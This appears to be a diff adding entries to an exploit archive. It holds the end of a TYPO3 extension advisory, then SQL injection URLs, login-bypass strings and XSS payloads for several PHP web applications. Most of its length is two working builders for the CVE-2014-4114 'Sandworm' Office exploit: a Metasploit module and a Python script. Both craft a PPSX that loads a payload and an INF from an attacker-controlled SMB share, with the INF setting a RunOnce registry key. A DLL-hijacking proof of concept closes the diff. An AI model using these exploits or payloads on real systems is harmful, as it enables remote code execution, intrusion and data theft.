htmlspecialchars($session['search']['keyword'], ENT_QUOTES);
To fix the SQL Injection vulnerability, replace line 257 with the following
PHP code:
$whereAdd[] = $table.'.uid_local=tx_dmmjobcontrol_job.uid AND
('.$table.'.uid_foreign='.implode(' OR '.$table.'.uid_foreign=',
intval($value)).')';
References:
----------------------------------------------------------------------
[1] TYPO3-EXT-SA-2014-012: Several vulnerabilities in extension JobControl
(dmmjobcontrol)
http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-012
--
*Best regards*
*Attacker: Adler - Team: FreiheitFacebook:
https://www.facebook.com/adler.freiheit
<https://www.facebook.com/adler.freiheit>*
*We are a white hat hacker.We are looking for security vulnerabilities. And
let you know.But we do not damage your system.*
*follow me! if you are interested in us!*

9
platforms/php/webapps/35009.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45003/info
AuraCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AuraCMS 1.62 is vulnerable; other versions may also be affected.
http://www.example.com/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7

13
platforms/php/webapps/35016.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45066/info
Easy Banner Free is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Easy Banner Free 2009.05.18 is vulnerable; other versions may also be affected.
username: &#039; or 1#
password: &#039; or &#039;a&#039;=&#039;a

13
platforms/php/webapps/35017.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/45066/info
Easy Banner Free is prone to multiple SQL-injection and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Easy Banner Free 2009.05.18 is vulnerable; other versions may also be affected.
&#039;siteurl&#039; : http://"><script>alert(XSS)</script><aa aa="
&#039;urlbanner&#039; : "><script>alert(XSS)</script><aa aa=".gif

7
platforms/php/webapps/35022.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45079/info
4homepages 4images is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/4images/categories.php?cat_id=1&page=-2999+%27%29+union/

238
platforms/win32/local/35020.rb Executable file
View file

@ -0,0 +1,238 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to
a failure in the CPackage::CreateTempFileName function.
This module will generate three files: an INF, a GIF, and a PPSX file. You are required to
set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an
older version of Winodws (such as XP) work best for this because they require little
configuration to get going. The PPSX file is what you should send to your target.
In detail, the vulnerability has to do with how the Object Packager 2 component
(packager.dll) handles an INF file that contains malicious registry changes, which may be
leveraged for code execution. First of all, Packager does not load the INF file directly.
But as an attacker, you can trick it to load your INF anyway by embedding the file path as
a remote share in an OLE object. The packager will then treat it as a type of media file,
and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will
download it with a CopyFileW call, save it in a temp folder, and pass that information for
later. The exploit will do this loading process twice: first for a fake gif file that's
actually the payload, and the second for the INF file.
The packager will also look at each OLE object's XML Presentation Command, specifically the
type and cmd property. In the exploit, "verb" media command type is used, and this triggers
the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd
property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3"
is used (again, for the INF file), it will cause the packager to try to find appropriate
handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that
will install/run the malicious INF file, and finally give us arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-4114'],
['OSVDB', '113140'],
['MSB', 'MS14-060'],
['BID', '70419'],
['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 14 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ])
], self.class)
end
def exploit
@unc = validate_unc_path
if @unc.nil?
fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
end
print_status("Creating the EXE payload...")
payload_name = "#{rand_text_alpha(4)}.gif"
p = generate_payload_exe
print_status("Creating the INF file...")
inf_name = "#{rand_text_alpha(4)}.inf"
inf = inf_file(payload_name)
print_status("Creating '#{datastore['FILENAME']}' file ...")
exe_stream = ole_exe(payload_name)
inf_stream = ole_inf(inf_name)
zip = zip_ppsx(exe_stream, inf_stream)
file_create(zip)
payload_path = my_file_create(p, payload_name)
print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
inf_path = my_file_create(inf, inf_name)
print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
end
def validate_unc_path
if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/
unc = datastore['UNCPATH']
else
unc = nil
end
unc
end
def my_file_create(data, name)
ltype = "exploit.fileformat.#{self.shortname}"
path = store_local(ltype, nil, data, name)
path
end
def zip_ppsx(ole_exe, ole_inf)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def ole_inf(file_name)
content = "EmbeddedStg2.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def ole_exe(file_name)
content = "EmbeddedStg1.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 02260200-0000-0000-c000-000000000046 # Video clip
clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
def inf_file(gif_name)
inf = <<-EOF
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
[RxRename]
#{gif_name}.exe, #{gif_name}
[RxStart]#
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
EOF
inf
end
end

93
platforms/windows/local/35019.py Executable file
View file

@ -0,0 +1,93 @@
#!/usr/bin/env python
import os
import zipfile
import sys
'''
Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit - Microsoft Offcie 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
e.g. python cve-2014-4114.py 10.0.0.233 rdb xxx.exe
10.0.0.233 - ip
rdb - share
xxx.exe - dropper
'''
host=sys.argv[1]
share=sys.argv[2]
mal_file=sys.argv[3]
print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print "Building ... \n "
# extract the original .ppsx PoC
mal_file= mal_file.replace(' ', '')[:-4].lower()
fh = open('expl.zip', 'rb')
z = zipfile.ZipFile(fh)
for name in z.namelist():
outpath = "./tmp"
z.extract(name, outpath)
fh.close()
os.mkdir('out')
os.chdir('tmp')
# oleObject1.bin mod for GIF
infile = open('ppt/embeddings/oleObject1.bin')
outfile = open('ppt/embeddings/1.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.gif':mal_file+'.gif'}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject1.bin')
os.rename ('ppt/embeddings/1.bin','ppt/embeddings/oleObject1.bin')
# oleObject2.bin mod for INF
infile = open('ppt/embeddings/oleObject2.bin')
outfile = open('ppt/embeddings/2.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.inf':mal_file+'.inf'}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject2.bin')
os.rename ('ppt/embeddings/2.bin','ppt/embeddings/oleObject2.bin')
os.system("zip -q -9 -r ../out/exploit.ppsx * ")
os.chdir('..')
# oleObject2.bin mod for INF prep
infile = open('expl.inf')
outfile = open('out/'+mal_file+'.inf','w')
replacements = {'slide1':mal_file}
for line in infile:
for src, target in replacements.iteritems():
line = line.replace(src, target)
outfile.write(line)
infile.close()
outfile.close()
os.system("rm -rf tmp")
print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.gif\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.inf\n'
print 'Done - collect your files from the [out] folder.\n'

74
platforms/windows/remote/35007.c Executable file
View file

@ -0,0 +1,74 @@
source: http://www.securityfocus.com/bid/44989/info
Multiple products from Native Instruments are prone to multiple vulnerabilities that let attackers execute arbitrary code.
An attacker can exploit these issues by enticing a legitimate user to use a vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
The issues affect the following:
Guitar Rig 4 Player 4.1.1
KONTAKT 4 PLAYER 4.1.3.4125
Service Center 2.2.5
REAKTOR 5 PLAYER 5.5.1.10584
/*
Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability
Vendor: Native Instruments GmbH
Product web page: http://www.native-instruments.com
Affected version: 4.1.1.1845 (Standalone)
Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
from Native Instruments, combining creative effects routing possibilities with
ease-of-use and pristine sound quality. The included FACTORY SELECTION library
provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
modifiers to shape and enhance any audio signal.
Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
exploited by remote attackers to compromise a vulnerable system. This issue is
caused due to the application insecurely loading certain libraries ("libjack.dll")
from the current working directory, which could allow attackers to execute arbitrary
code by tricking a user into opening specific related files (.nkm and .nkp) from a
network share.
Tested on: Microsoft Windows XP Professional SP3 (English)
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2010-4973
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php
06.11.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}